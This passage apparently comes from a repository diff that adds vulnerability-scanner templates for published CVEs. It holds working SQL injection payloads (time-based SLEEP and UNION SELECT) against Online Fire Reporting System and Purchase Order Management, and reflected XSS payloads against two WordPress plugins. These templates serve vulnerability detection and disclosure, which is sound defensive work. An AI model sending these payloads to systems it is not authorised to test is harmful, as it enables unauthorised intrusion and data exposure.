cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.2
|
||||
cve-id: CVE-2022-31980
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
max-req: 1
|
||||
verified: "true"
|
||||
tags: cve,cve2022,sqli,online-fire-reporting
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/admin/?page=teams/manage_team&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "Control Teams")'
|
||||
condition: and
|
|
@ -0,0 +1,35 @@
|
|||
id: CVE-2022-31981
|
||||
|
||||
info:
|
||||
name: Online Fire Reporting System v1.0 - SQL injection
|
||||
author: theamanrawat
|
||||
severity: high
|
||||
description: |
|
||||
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=teams/view_team&id=.
|
||||
reference:
|
||||
- https://github.com/k0xx11/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-6.md
|
||||
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-31981
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.2
|
||||
cve-id: CVE-2022-31981
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: "true"
|
||||
tags: cve,cve2022,sqli,online-fire-reporting
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/admin/?page=teams/view_team&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "Control Teams")'
|
||||
condition: and
|
|
@ -0,0 +1,35 @@
|
|||
id: CVE-2022-31982
|
||||
|
||||
info:
|
||||
name: Online Fire Reporting System v1.0 - SQL injection
|
||||
author: theamanrawat
|
||||
severity: high
|
||||
description: |
|
||||
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/view_request&id=.
|
||||
reference:
|
||||
- https://github.com/k0xx11/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-8.md
|
||||
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-31982
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.2
|
||||
cve-id: CVE-2022-31982
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
max-req: 1
|
||||
verified: "true"
|
||||
tags: cve,cve2022,sqli,online-fire-reporting
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/admin/?page=requests/view_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "Request Detail")'
|
||||
condition: and
|
|
@ -0,0 +1,35 @@
|
|||
id: CVE-2022-31983
|
||||
|
||||
info:
|
||||
name: Online Fire Reporting System v1.0 - SQL injection
|
||||
author: theamanrawat
|
||||
severity: high
|
||||
description: |
|
||||
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/manage_request&id=.
|
||||
reference:
|
||||
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-9.md
|
||||
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-31983
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.2
|
||||
cve-id: CVE-2022-31983
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
max-req: 1
|
||||
verified: "true"
|
||||
tags: cve,cve2022,sqli,online-fire-reporting
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/admin/?page=requests/manage_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "Request Detail")'
|
||||
condition: and
|
|
@ -0,0 +1,40 @@
|
|||
id: CVE-2022-31984
|
||||
|
||||
info:
|
||||
name: Online Fire Reporting System v1.0 - SQL injection
|
||||
author: theamanrawat
|
||||
severity: high
|
||||
description: |
|
||||
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/requests/take_action.php?id=.
|
||||
reference:
|
||||
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-10.md
|
||||
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-31984
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.2
|
||||
cve-id: CVE-2022-31984
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
max-req: 1
|
||||
verified: "true"
|
||||
tags: cve,cve2022,sqli,online-fire-reporting
|
||||
|
||||
variables:
|
||||
num: '999999999'
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/admin/requests/take_action.php?id=6'+UNION+ALL+SELECT+md5('{{num}}'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '{{md5(num)}}'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,44 @@
|
|||
id: CVE-2023-0948
|
||||
|
||||
info:
|
||||
name: WordPress Japanized for WooCommerce <2.5.8 - Cross-Site Scripting
|
||||
author: r3Y3r53
|
||||
severity: medium
|
||||
description: |
|
||||
WordPress Japanized for WooCommerce plugin before 2.5.8 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/a78d75b2-85a0-41eb-9720-c726ca2e8718
|
||||
- https://wordpress.org/plugins/woocommerce-for-japan/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-0948
|
||||
remediation: Fixed in version 2.5.8.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2023-0948
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: "true"
|
||||
tags: cve,cve2023,xss,woocommerce-for-japan,wordpress,wp-plugin,wpscan,wp,authenticated
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin.php?page=peachpay&tab=field&"><script>alert(/XSS/)</script> HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code_2 == 200'
|
||||
- 'contains(body_2, "<script>alert(/XSS/)</script>")'
|
||||
- 'contains(body_2, "peachpay")'
|
||||
condition: and
|
|
@ -0,0 +1,44 @@
|
|||
id: CVE-2023-2122
|
||||
|
||||
info:
|
||||
name: Image Optimizer by 10web < 1.0.26 - Cross-Site Scripting
|
||||
author: r3Y3r53
|
||||
severity: medium
|
||||
description: |
|
||||
Image Optimizer by 10web before 1.0.26 is susceptible to cross-site scripting via the iowd_tabs_active parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
remediation: Fixed in version 1.0.27
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/936fd93a-428d-4744-a4fc-c8da78dcbe78
|
||||
- https://wordpress.org/plugins/image-optimizer-wd/advanced/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-2122
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2023-2122
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
max-request: 2
|
||||
verified: "true"
|
||||
tags: cve,cve2023,xss,image-optimizer-wd,wordpress,wp-plugin,wpscan,wp,authenticated
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin.php?page=iowd_settings&msg=1&iowd_tabs_active=generalry8uo%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ef0cmo HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code_2 == 200'
|
||||
- 'contains(body_2, "<img src=a onerror=alert(document.domain)>")'
|
||||
- 'contains(body_2, "Image optimizer")'
|
||||
condition: and
|
|
@ -0,0 +1,34 @@
|
|||
id: CVE-2023-2130
|
||||
|
||||
info:
|
||||
name: Purchase Order Management v1.0 - SQL Injection (Unauthenticated)
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
A vulnerability classified as critical has been found in SourceCodester Purchase Order Management System 1.0. Affected is an unknown function of the file /admin/suppliers/view_details.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226206 is the identifier assigned to this vulnerability.
|
||||
reference:
|
||||
- https://github.com/zitozito1/bug_report/blob/main/SQLi.md
|
||||
- https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-2130
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2023-2130
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2023,sqli,purchase-order-management-system,unauthenticated
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/admin/suppliers/view_details.php?id=1'+AND+(SELECT+9687+FROM+(SELECT(SLEEP(6)))pnac)+AND+'ARHJ'='ARHJ"
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(header, "text/html")'
|
||||
- 'contains(body, "Supplier Name")'
|
||||
condition: and
|
|
@ -0,0 +1,39 @@
|
|||
id: CVE-2023-29622
|
||||
|
||||
info:
|
||||
name: Purchase Order Management v1.0 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
Purchase Order Management v1.0 was discovered to contain a SQL injection vulnerability via the password parameter at /purchase_order/admin/login.php.
|
||||
reference:
|
||||
- https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Purchase-Order-Management-1.0/SQLi
|
||||
- https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-29622
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2023-29622
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
max-req: 1
|
||||
verified: "true"
|
||||
tags: cve,cve2023,sqli,purchase-order,poms
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /classes/Login.php?f=login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
|
||||
username=test&password=test')+AND+(SELECT+4458+FROM+(SELECT(SLEEP(6)))JblN)+AND+('orQN'='orQN
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(header, "text/html")'
|
||||
- 'contains(body, "status\":\"incorrect")'
|
||||
condition: and
|
|
@ -0,0 +1,47 @@
|
|||
id: CVE-2023-29623
|
||||
|
||||
info:
|
||||
name: Purchase Order Management v1.0 - Cross Site Scripting (Reflected)
|
||||
author: theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
Purchase Order Management v1.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the password parameter at /purchase_order/classes/login.php.
|
||||
reference:
|
||||
- https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Purchase-Order-Management-1.0/XSS-Reflected
|
||||
- https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-29623
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2023-29623
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2023,xss,purchase-order-management-system,unauth
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /classes/Login.php?f=login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
|
||||
username={{randstr}}&password=%3cimg%20src%3dx%20onerror%3dalert(document.domain)%3e
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<img src=x onerror=alert(document.domain)>"
|
||||
- "incorrect"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,28 @@
|
|||
id: spotweb-login-panel
|
||||
|
||||
info:
|
||||
name: SpotWeb Login Panel - Detect
|
||||
author: theamanrawat
|
||||
severity: info
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"SpotWeb - overview"
|
||||
tags: panel,spotweb,detect
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "SpotWeb - overview"
|
||||
- "initSpotwebJs"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue